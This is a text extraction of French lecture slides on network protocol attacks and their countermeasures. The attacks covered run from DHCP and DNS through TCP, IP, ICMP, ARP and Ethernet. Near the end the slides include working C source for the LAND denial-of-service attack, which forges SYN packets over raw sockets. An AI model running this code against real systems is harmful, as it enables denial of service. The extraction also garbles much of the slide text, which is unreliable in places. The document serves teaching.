Chapitre 2

Télécharger au format pdf ou txt
Télécharger au format pdf ou txt
Vous êtes sur la page 1sur 14

Définitions

„ Attaques:
… Action
A i malveillante
l ill exploitant
l i des
d vulnérabilités
l é bili é d’un
d’ système
è
Cours … Employées pour casser les services de la sécurité en détournant les
mécanismes
Sé ité ett cryptographie
Sécurité t hi „ Vulnérabilité:
… Défaut ou faiblesse dd’un
un système dans sa conception,
conception sa mise en œuvre ou
Chapitre 2: son contrôle interne pouvant mener à une faille de sécurité ou à la violation
de sa politique de sécurité.
Attaques réseaux et vulnérabilités … Une vulnérabilité ppeut être exploitée
p de façon
ç accidentelle ou de façon
ç
protocolaires malicieuse.

„ Menace:
… La possibilité qu’une vulnérabilité soit exploitée accidentellement ou par un
agent malicieux.

Hdhili M.H Cours sécurité et cryptographie 1 Hdhili M. H Cours sécurité et cryptographie 2

Objectifs des attaquants Classifications des attaques


Exécutées par des entités externes au
„ Objectifs des attaquants „ Motivation des attaquants Externes système victime
Selon
… Désinformer … Vengeance/rancune Exécutées
E é té par d des entités
tité internes
i t au
l’origine
Internes système victime parce qu’ils sont malicieux
… Empêcher l'accès à une … Politique/religion
ou détenu par des attaquants
ressource … Défis intellectuels
Passives Ecoute du système (réseau) pour l’analyser
… Prendre le contrôle d'une … Envie de nuire aux autres Selon
ll’action
action Injection, suppression ou modification de
ressource … Impressionner les autres Actives
données
… Récupérer
p de l'information … Vol dd’informations
informations
Attaques Exploiter le réseau pour lancer des attaques
… Utiliser le système compromis … Désir d’argent Réseaux sur le réseau ou sur le système d’information
pour attaquer un autre (rebondir)
… Falsification d’informations Selon la Attaques
Attaquer les serveurs web (pages web)
… … cible Web


3 Hdhili M. H Cours sécurité et cryptographie 4
Les attaques réseaux

„ Attaques passives

… Écoute et analyse du trafic réseau


Æ Exemple d’outils: wireshark, tcpdump
Æ But: trouver des informations susceptibles d'intéresser un attaquant

Les attaques réseaux Æ Adresses IP importantes

Æ Architecture du réseau

Æ Emplacement des nœuds

Æ Informations d’authentification

Æ Information secrète (en cas de guerre par exemple)

Æ …

Hdhili M. H Cours sécurité et cryptographie 5 Hdhili M. H Cours sécurité et cryptographie 6

Les attaques réseaux Les attaques réseaux

„ Attaques actives „ Les attaques réseaux exploitent les faiblesses (vulnérabilités)


… Modification des données stockées ou en transit
… Des protocoles:
„ Conception simple, légère et non sécurisé
… Injection de données
„ Fabrication (mascarade): injecter des données en spécifiant une adresse source … Des mécanismes d’authentification:
légitime „ Exemple: usurpation dd’identité
identité
„ Rejeu: ré-envoyer d’anciens données
… Des implémentation:
… Suppression de données „ Exemple: mot de passe en clair sur le réseau, bugs

… Des configuration :
„ Exemple: Firewall mal configuré laissant passer un trafic non autorisé.

Hdhili M. H Cours sécurité et cryptographie 7 Hdhili M. H Cours sécurité et cryptographie 8


Les attaques réseaux (plan) Les attaques réseaux

„ Les attaques sur les protocoles


… Niveau Application
pp
„ DNS, DHCP

… Niveau transport
„ TCP Les attaques niveau application
DNS,, DHCP
… Niveau réseau
„ IP, ICMP

… Niveau liaison
„ Ethernet

Hdhili M. H Cours sécurité et cryptographie 9 Hdhili M. H Cours sécurité et cryptographie 10

DHCP- rappel DHCP- rappel


… Le client diffuse une demande de bail IP (DHCPDISCOVER) contenant … Le client sélectionne la première offre (adresse IP) reçue et diffuse un
l’adresse IP source 0.0.0.0, l’adresse IP destination 255.255.255.255 et son message (DHCPREQUEST) d'utilisation de cette adresse au serveur DHCP.
adresse MAC. Son messageg envoyé y ppar diffusion comporte
p l'identification du serveur
… Les serveurs DHCP répondent en unicast par un (DHCOFFER) en sélectionné qui est informé que son offre a été retenue ; tous les autres
proposant une adresse IP avec une durée de bail et l'adresse IP du serveur serveurs DHCP retirent leur offre et les adresses proposées redeviennent
DHCP disponibles.
… Le
L serveur DHCP accuse réception
é i ded la
l demande
d d (en
( unicast)
i ) et accorde
d
l'adresse en bail (DHCPACK).

Hdhili M. H Cours sécurité et cryptographie 11 Hdhili M. H Cours sécurité et cryptographie 12


DHCP- attaques Attaque DHCP starvation

„ Vulnérabilité:
„ Épuisement des adresses IP – DCHP Starvation … Les requêtes
q DHCP ne sont ppas authentifiées.
„ Attaque:
„ Faux serveur DHCP
… L’attaquant inonde le serveur avec des messages DHCPREQUEST afin de
réserver toutes les adresses IP disponibles.
… L’attaquant doit utiliser une nouvelle adresses MAC pour chaque requête.
„ Risque:
… Dénis de service.
„ Contre mesures:
… Limiter le nombre d’adresses MAC permises sur un port donné.
… Authentification

Hdhili M. H Cours sécurité et cryptographie 13 Hdhili M. H Cours sécurité et cryptographie 14

Faux serveurs DHCP Faux serveurs DHCP

„ Vulnérabilité: Les requêtes DHCP ne sont pas authentifiées. „ Risque:


„ Attaque: L
L’attaquant
attaquant prend le rôle dd’un
un serveur DCHP
DCHP. … Dénis de service.
… L’attaquant répond avec un DHCPOFFER en donnant de fausses paramètres … Divulgation d’informations sensibles (p.ex. mots de passe) qui ne devraient
IP à l’utilisateur pas être envoyées sur un port.
„ Fausses adresses IP et réseau
„ Faux routeur par défaut
„ Contre mesures:
… L
L’adresse
adresse de ll’attaquant
attaquant si celui veut voir tout le trafic de la victime.
… DHCP snooping : Défense contre le DHCP spoofing
… L’attaquant peut effectuer un déni de service sur le serveur légitime afin
„ Implémenté dans certains commutateurs CISCO
qu’il n’interfère pas avec cette attaque.
„ Mettre en p
place une liste de ports
p sur le commutateur sur lequel
q se trouvent les
“trusted dhcp server”.
Î Limite l’impact de l’attaque

Hdhili M. H Cours sécurité et cryptographie 15 Hdhili M. H Cours sécurité et cryptographie 16


DNS- Rappel DNS- Rappel (mode itératif)

„ Assurer la conversion noms d’hôtes - adresses IP


Machine.domaine.xyz
y <==> 193.95.66.15
„ Un serveur DNS reçoit des requêtes du type:
… DNS Query (Quel est l’adresse de www.abc.tn)
„ Il a deux choix:
… Répondre à la requête (Mode Itératif)
„ DNS Answer: www.abc.tn Î 195.93.66.41
… Tout en disant si l’information provient de la mémoire cache ou si le
serveur est l’autorité responsable de ce domaine.
„ DNS Answer: www.abc.tn Î inconnu ?
… Voici une liste de serveurs DNS qui pourraient répondre: …..

… Effectuer une autre requête (Mode récursif)


„ DNS Query (Quelle est l’adresse de www.abc.tn?)
… Cette nouvelle requête est envoyée vers d’autres serveurs DNS.

Hdhili M. H Cours sécurité et cryptographie 17 Hdhili M. H Cours sécurité et cryptographie 18

DNS- Rappel (mode récursif) DNS- Rappel

„ Serveurs DNS envoient régulièrement des requêtes du type :


… DNS Q
Query
y (Q
(Quelle est l’adresse de www.abc.tn?))
„ Serveurs DNS reçoivent alors des réponses du type
… DNS Answer (www.abc.tn Æ Î 195.93.66.41)
„ Ces réponses ne sont pas authentifiées (pas de cryptographie)
„ Bien que:
q
… L’entête DNS contient un numéro permettant d’associer une réponse à une
question (16 bits). Mais, ce numéro peut être deviné!
… Port
P t UDP du d client
li t DNS (16 bits)
bit ) Mais,
M i le l client
li t peutt être
êt amenéé à toujours
t j
utiliser le même port pour faciliter la configuration du pare-feu.
„ Æ Il est simple de forger une réponse malicieuse à une
question légitime.

Hdhili M. H Cours sécurité et cryptographie 19 Hdhili M. H Cours sécurité et cryptographie 20


Attaque DNS cache poisoning Email - attaques

„ Email Bombing/Spamming
„ Vulnérabilité: … Données
… Les messages DNS ne sont pas authentifiés. … Falsification de l ’adresse d ’origine
… Attaque:
„ Attaque:
q
… Bombing:
bi envoii d ’un message répété à une même adresse
d
… L’attaquant envoie de faux messages à un serveur DNS local. … Spamming:le message est envoyé à des milliers d ’adresses
„ Réponse qui spécifie un nom de domaine différent que celui demandé Î à
… Objectif:
j
ignorer
… congestion du réseau
„ Réponse qui spécifie un serveur DNS appartenant à un domaine différent de
… crash du serveur de messagerie
celui demandé Î douteux
„ Réponse contenant une adresse suspecte (frauduleuse) … Parade
… Supervision, filtrage…
„ Risque:
… R di ti du
Redirection d trafic
t fi légitime
lé iti

Hdhili M. H Cours sécurité et cryptographie 21 Hdhili M. H Cours sécurité et cryptographie 22

Les attaques réseaux TCP- Rappel


… Ordonnancement des paquets:
„ numéro de séquence par octet
… fenêtre d’anticipation ajustable par le destinataire
… Accusés de réception

Port source Port destination


Les attaques niveau transport
TCP,, UDP N
Numéro
é d
de séquence
é

Numéro d’ACK

Long. U A P R S F Fenêtre
En-tête R C S S Y I
G K H T N N
Ch k
Checksum P i t
Pointeur urgentt

Options (exemples : négociation du MSS Max segment size (non inclus l’entête
TCP,, p
par defaut 536 bytes),
y ), « Window scale factor »,, No-Op,
p, utilisation d’un
protocole de retransmission sélective RFC 1106 …)

Hdhili M. H Cours sécurité et cryptographie 23 Hdhili M. H Cours sécurité et cryptographie 24


TCP- Rappel TCP-attaques

„ Etablissement d’une connexion „ TCP syn flooding


… Données:
„ Attente dans l’état SYN_RECVD (75s)
„ Nombre limité de connexions dans cet
état
… Attaque: LISTEN
„ Etablir plusieurs connexion successives
semi-ouverte (evec adresse IP fausse) SYN RECVD
SYN_RECVD
afin de saturer la pile TCP de la victime
Rejet (ex. serveur
indisponible) … Risque:
q
„ DoS, Perte de connectivité CONNECTED
… Parade «Three way hand shake»
«Three way hand shake» collision : établissement
d’une même connexion
„ SYN cache,
h SYN cookies
ki dans
d les
l OS
modernes
„ Filtrage en analysant les communication
TCP

Hdhili M. H Cours sécurité et cryptographie 25 Hdhili M. H Cours sécurité et cryptographie 26

TCP-attaques TCP-attaques

„ TCP Reset Flooding „ TCP Hijacking (Man in the middle)


… Données: … Vulnérabilité:
„ TCP réordonne les paquets selon leur numéro de séquence. „ Les applications authentifient généralement les participants
„ Les paquets sont acceptés seulement si leur numéro correspond à seulement lors des ouvertures de session.
un intervalle
intervalle. … Attaque:
… Vulnérabilité: „ L’attaquant écoute une communication puis après que le
„ Les paquets TCP ne sont authentifiés que par leur numéro de participant s’est authentifié, il injecte des paquets dans la
séquence et leurs paramètres de session. connexion.
i
… Interrompt la connexion du point de vue du client.
… Attaque:
… Personnifie le client face au serveur.
„ inonder la victime avec des paquets TCP RST afin dd’interrompre
interrompre
une connexion. Rejet (ex. … Risque: «Three way hand
serveur shake»
… Risque: DoS „ Dénis de service
indisponible)
… Parade
P d „ Divulgation dd’informations
informations sensibles qui ne peuvent être obtenues
qu’après authentification.
„ Numéros de séquence imprévisibles Î RFC 1948 – Defending
Against Sequence Number Attacks … Parade
„ Petits intervalles de validité Î Perte de robustesse. „ Utilisation de protocoles cryptographiques (SSL…).
Hdhili M. H Cours sécurité et cryptographie 27 Hdhili M. H Cours sécurité et cryptographie 28
UDP-Attaques Les attaques réseaux

„ UDP bombing
… Données:
„ Deux services utilisés dans le passé pour le test du réseau et sont activés par
défaut
… Service echo: echo des caractères reçus

… Service chargen: générateur de caractères


Les attaques niveau réseau
… Attaque:
… Établir une connexion entre ces deux services (dans deux machines IP ICMP,
IP, ICMP ARP
différentes ou dans la même machine)
… Objectifs
… Congestion du réseau et dégradation des performances des machines
victimes
… Parade:
… désactiver les ports correspondants

Hdhili M. H Cours sécurité et cryptographie 29 Hdhili M. H Cours sécurité et cryptographie 30

IP- Rappel IP- attaques sur la fragmentation IP


Bits 0-2: Précédence.
Longueur de Bit 3: 0 = Normal Delay, 1 = Low Delay. „ Ping of death attack
l’entête IP, Mesurée Bits 4: 0 = débit normal, 1 = débit élevé.
en nombre de mots Bits 5: 0 = fiabilité normale,
normale 1 = élevé.
élevé … Données:
Version
V i
de 32 bits (4bits) Bit 6-7: Réservé pour un usage future. „ Taille maximum d ’un paquet IP = 65535 octets
(4 bits)
32 Bits Longueur totale „ ICMP est encapsulé par IP
du paquet IP,
TOS (8bits)
(8bit ) Mesuré en … V l é bili é
Vulnérabilité:
20 octet Vers=4HLen Total Length (16bits) octets; Incluant
RFC 1349 „ IP ne teste pas la longueur totale des fragments avant de les réassembler
l’entête
Time to Id. Fragment (16bits) Flags Offset du FRAGMENT … Attaque:
q
Live
Live,
décrémenté CRC sur „ Générer des fragments appartenant à des paquets ICMP de taille > 65535
toutes les TTL (8bits) Protocol Checksum (16bits) l’entête IP
secondes … Risque:
dans
da s
chaque Adresse IP source (32bits) „ Le réassemblage des fragments provoque le crash du buffer ou le reboot du
routeur et à système
Bourrage
sa traversé Adresse IP destination (32bits)
pour que … Contres mesures:
l’ têt soit
l’entête it
(OPTIONS) (PAD) „ Patches (déjà existants dans les nouveaux OS)
Indique le exactement
protocole de
Données Multiple Î les systèmes récents ne sont plus vulnérable à cette attaque
la couche de 32-Bits
32 Bits
supérieure
Hdhili M. H Cours sécurité et cryptographie 31 Hdhili M. H Cours sécurité et cryptographie 32
IP- attaques sur la fragmentation IP IP- attaques sur la fragmentation IP

„ Tiny Fragment attack „ Teardrop attack


… Données: … Donnée
„ TCP est encapsulé dans IP „ L’entête II contient un champs offset qui indique l’emplacement du fragment
… Vulnérabilité dans le paquet initial
„ Les filtres
fil testent généralement
l le
l premier
i fragment
f … Attaque:
… Attaque: „ Insertion de faux offsets résultant en des
… Chevauchement de fragment
„ Utiliser de p
petit fragments
g ppour forcer la division de l’entête TCP sur deux
fragments … Gaps (vide) entre fragments

„ Exemple: les flags TCP sont placés dans le second fragment, ce qui ne permet … Risque:
pas au filtres de supprimer les connexions indésirable „ Instabilité du système,
système DoS
… Risque … Contre mesure
„ Établissement de connexions indésirables: intrusions „ Patches
… Contres mesures Î les systèmes récents ne sont plus vulnérable à cette attaque
„ Fixer, au niveau des filtres, une taille minimale du premier fragment

Hdhili M. H Cours sécurité et cryptographie 33 Hdhili M. H Cours sécurité et cryptographie 34

IP-attaque sur l’adressage IP IP-attaque sur l’adressage IP

„ IP spoofing (usurpation d’identité) „ Smurf:

… Vulnérabilité: … Données
„ L’adresse IP source est contrôlé par l’envoyeur … IP permet la diffusion !

… Attaque … Attaque:
„ L attaquant peut envoyer des attaques tout en personnifiant nn’importe
L’attaquant importe quelle … Inondation du réseau avec des ping ayant des adresses de diffusion et une
source pour ne pas être retracé. adresse source fausse ou d’une victime

… Risque:
i … Risques:
i
„ Utiliser les privilèges de l’adresse usurpée. … Rendre indisponible un service, un système ou un réseau

… Contre mesure: … Parade


„ Authentification (Ipsec, SSL…) … Ne pas répondre pour les adresses broadcast, filtrage

Hdhili M. H Cours sécurité et cryptographie 35 Hdhili M. H Cours sécurité et cryptographie 36


IP-attaque sur l’adressage IP ICMP- Rappel

„ LAND (Local Area Network Denial of service): „ Deux types de paquet ICMP :
… Les messages d’indication d’erreur;
… Vulnérabilité: … Les messages de demande d’information.

„ Les champs @IP source et @IP destination peuvent être similaire

… Attaque:
„ Forger plusieurs segments TCP syn @IP source et @IP destination identiques et
égales à l ’adresse de la machine victime

… Risques:
i
„ Types et codes :
… La victime répond à elle-même continuellement
… Exemples:
… DoS: congestion
g de la victime
… Parades:
… Filtrage, patch sur les systèmes

Hdhili M. H Cours sécurité et cryptographie 37 Hdhili M. H Cours sécurité et cryptographie 38

ICMP- Attaques ARP-Rappel

„ Vulnérabilités logicielles Je cherche l’adresse


Physique du noeud d’@
… Ping-of-death
g IP: 141.23.56.23

„ Paquet IP de plus de 65,535 octets.


requête ARP
„ Inondation
station
… Smurf Attack
„ Ping echo request à un réseau en personnifiant la victime. Cette victime reçoit
une multitude de Ping echo reply. ( ) requête
(a) ê ARP
„ ICMP Destination Unreachable ou Time Exceeded malicious
Je suis le noeud que vous
… La victime ppeut alors interrompre
p sa communication. Cherchez et mon adresse
est: A46EF45983AB
„ ICMP Redirection
REPONSE ARP
… Un attaquant envoie à une machine un message ICMP-redirect pour lui
indiquer un autre chemin à suivre (qui passe par lui) station

„ Parade
… Les paquets ICMP-redirect
L ICMP di ne devraient
d i pas être
ê acceptéé par les
l serveurs, (b) Réponse ARP
routeurs et poste utilisateurs
Hdhili M. H Cours sécurité et cryptographie 39 Hdhili M. H Cours sécurité et cryptographie 40
ARP-Attaques ARP-Attaques

„ ARP spoofing „ ARP spoofing


… Vulnérabilité:
„ Toute personne peut clamer être le propriétaire d’une adresse IP donnée
(Gratuitous ARP Reply).
„ Selon le protocole,
protocole il est possible dd’envoyer
envoyer un ARP Reply sans sollicitation au
préalable. ÎGratuitous ARP Reply.
… Attaque:
„ L’attaquant s’insère entre deux intervenants IP au niveau Ethernet Î Man-in-
the-middle.
„ Pour l’intervenant A, l’attaquant possède l’adresse IP de B.
Î Gratuitous ARP Reply avec l’adresse MAC de l’attaquant et l’adresse IP de B.
„ Pour l’intervenant B, l’attaquant possède l’adresse IP de A.
Î Gratuitous ARP Reply avec l’adresse
l adresse MAC de ll’attaquant
attaquant et ll’adresse
adresse IP de A.
A
… Risques:
„ Divulgation d’informations sensibles (p.ex. mots de passe)
… Parade: Éviter de considérer les Gratuitous ARP Reply.
Hdhili M. H Cours sécurité et cryptographie 41 Hdhili M. H Cours sécurité et cryptographie 42

Les attaques réseaux Ethernet - Rappel


… Réseau composé de répétiteurs (hubs) et de commutateurs (switches) liés en
point à point
… Les hubs diffuse les trames.
… Les commutateur utilisent leurs tables de commutation pour diriger une
trame vers un port spécifique ss’il
il peut déterminer à quel sous réseau
appartient le destinataire de la trame. Sinon, la trame est diffusé de façon
Les attaques niveau Liaison générale.
Eth
Ethernet
t

Hdhili M. H Cours sécurité et cryptographie 43 Hdhili M. H Cours sécurité et cryptographie 44


Ethernet - Attaques Inondation de la TC

„ Vulnérabilité:
… Inondation de la table de commutation TC … Lorsqu’une
q adresse MAC ne se retrouve ppas dans la table TC,, le
… Mystification de l’adresse MAC (MAC spoofing) commutateur diffuse la trame sur tous les ports.
… Manipulation de l’arbre sous-tendant (spanning tree) „ Attaque:
… Manipulation du VLAN (VLAN hopping) … L’attaquant inonde le commutateur avec de fausses trames.
„ Le commutateur ajoute les pairs (MAC (source de la trame), Port) dans sa table
q cette table est pleine,
TC. Lorsque p , il enlève des entrées.
„ Lorsqu’une entrée valide est enlevée, tout le trafic y étant associé est maintenant
diffusé sur tous les ports.
„ Logiciel macof permet de créer des paquets avec des adresses MAC et IP
aléatoires.
„ Risque:
… Divulgation d’informations sensibles (p.ex. mots de passe) qui ne devraient
pas être envoyées sur un port.
„ Logiciel dd’analyse
analyse de trafic Ethereal / Wireshark.
Wireshark

Hdhili M. H Cours sécurité et cryptographie 45 Hdhili M. H Cours sécurité et cryptographie 46

Inondation de la TC Mystification d’une adresse MAC

„ Parades: „ Vulnérabilité:
… Lorsqu’une
q adresse MAC ((source)) apparaît
pp sur un autre pport,, le
… Limiter le nombre d’adresses MAC permises sur un port donné. commutateur met à jour sa table TC.
… Limiter la durée qu’une adresse sera assignée à un port. „ Attaque:
„ Une fois pleine de fausses entrées, la table se videra d’elle-même. … Inonder le commutateur avec de fausses trames ayant l’adresse MAC ciblée
„ Le commutateur ajoute cette nouvelle paire (MAC, Port) dans sa table TC et
… Assigner des adresses MAC statiques à des ports.
ports enlève celle q
qui était déjà
j là.
„ Ces adresses ne seraient jamais enlevées si la table devenait pleine. „ Concurrence critique avec l’ordinateur légitime.
„ Les adresses des serveurs ou des équipements importants sont ainsi configurées … Logiciel macof permet de créer de telles trames (paquets).
d
dans lle commutateur. „ Risque:
… Dénis de service
… Authentification 802.1X … Divulgation
Di l ti d’informations
d’i f ti sensibles
ibl (p.ex.
( mots
t de
d passe)) quii ne devraient
d i t
„ L’accès à un port n’est permis qu’après une authentification. pas être envoyées sur un port.

Hdhili M. H Cours sécurité et cryptographie 47 Hdhili M. H Cours sécurité et cryptographie 48


Mystification d’une adresse MAC Exemple de code source (attaque LAND)
int main(int argc,char * argv[])
{
„ Parades: struct sockaddr_in sin;
… Assigner des adresses MAC statiques à des ports. struct hostent * hoste;
„ Ces adresses ne seront jamais enlevées. int
t soc
sock;
;
„ Les adresses des serveurs ou des équipements importants sont ainsi configurées char buffer[40];
dans le commutateur.
struct iphdr * ipheader=(struct iphdr *) buffer;
struct tcphdr
hd * tcpheader=(struct
h d ( tcphdr
hd *)
… Les adresses MAC sont obtenues lors de la requête DHCP. (buffer+sizeof(struct iphdr));
„ Éviter d’utiliser une adresse IP avec une autre adresse MAC. struct pseudohdr pseudoheader;
„ Fonctionnalité CISCO/Nortel. if(argc<3) {
fprintf(stderr,"usage: %s IP port\n",argv[0]);
return( 1);
return(-1);
… Authentification 802.1X
}
„ L’accès à un port n’est permis qu’après une authentification.
bzero(&sin,sizeof(struct sockaddr_in));
sin.sin_family=AF_INET;
Hdhili M. H Cours sécurité et cryptographie 49 Hdhili M. H Cours sécurité et cryptographie 50

Exemple de code source (attaque LAND) Exemple de code source (attaque LAND)
if((hoste=gethostbyname(argv[1]))!=NULL) bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));
bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length); ipheader->version=4;
else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1) ipheader->ihl=sizeof(struct iphdr)/4;
{ ipheader->tot_len=htons(sizeof(struct
fprintf(stderr,"unknown
p t (stde , u o host
ost %s\
%s\n",argv[1]);
,a g [ ]); iphdr)+sizeof(struct tcphdr));
return(-1); ipheader->id=htons(0xF1C);
} ipheader->ttl=255;
if(( i
if((sin.sin_port=htons(atoi(argv[2])))==0)
i h ( i( [2]))) 0)
ipheader->protocol=IP_TCP;
{
ipheader->saddr=sin.sin_addr.s_addr;
fprintf(stderr,"unknown
p p
port %s\n",argv[2]);
g
ipheader->daddr=sin.sin_addr.s_addr;
return(-1);
}
if((
if((sock=socket(AF_INET,SOCK_RAW,255))==-1){
k k t(AF INET SOCK RAW 255)) 1){ tcpheader >th_sport
tcpheader->th sport=sin
sin.sin_port;
sin port;
fprintf(stderr,"couldn't allocate raw socket\n"); tcpheader->th_dport=sin.sin_port;
return(-1);
return( 1); tcpheader->th_seq=htonl(0xF1C);
} tcpheader->th_flags=TH_SYN;
Hdhili M. H Cours sécurité et cryptographie 51 Hdhili M. H Cours sécurité et cryptographie 52
Exemple de code source (attaque LAND)
tcpheader->th_off=sizeof(struct tcphdr)/4;
tcpheader->th_win=htons(2048);
bzero(&pseudoheader,12+sizeof(struct tcphdr));
pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
d h d d dd dd i i dd dd
pseudoheader.protocol=6;
pseudoheader.length=htons(sizeof(struct
pseudoheader.length htons(sizeof(struct tcphdr));
Les attaques des logiciels
bcopy((char *) tcpheader,(char *)
&pseudoheader.tcpheader,sizeof(struct tcphdr));
tcpheader->th_sum=checksum((u_short *)
&pseudoheader,12+sizeof(struct tcphdr));
sendto(sock,buffer,sizeof(struct iphdr)+sizeof(struct
tcphdr),0,(struct sockaddr *) &sin,sizeof(struct
sockaddr_in));
close(sock);
l ( k) return(0);
t (0)
}
Hdhili M. H 53 Hdhili M. H 54
Cours sécurité et cryptographie Cours sécurité et cryptographie

Vous aimerez peut-être aussi